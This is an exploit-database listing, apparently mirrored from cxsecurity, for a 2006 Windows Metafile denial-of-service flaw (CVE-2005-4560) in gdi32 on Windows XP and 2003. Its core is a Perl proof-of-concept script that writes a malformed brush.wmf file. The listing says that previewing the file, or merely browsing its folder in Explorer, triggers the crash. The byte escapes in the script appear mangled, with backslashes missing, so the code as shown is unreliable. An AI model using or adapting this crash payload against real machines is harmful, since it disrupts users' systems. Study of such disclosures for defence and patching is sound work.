0-day XP SP2 wmf exploit

CVE	Category	Price	Severity
CVE-2005-4560	CWE-119	Not specified	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2006-08-15

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080062

Below is a copy:

Description:

yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "nWMF PoC denial of service exploit by cyanid-E <[email protected]>";
print "nngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf filen";
print WMF "x01x00x09x00x00x03x22x00x00x00x63x79x61x6Ex69x64";
print WMF "x2Dx45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00";
print WMF "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00";
print WMF "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00";
print WMF "x00x00x00x00";
close(WMF);
print "oknnnow try to browse folder in XP explorer and wait :)n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).

Discovered:

06/24/2006; vendor informed but not answered

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum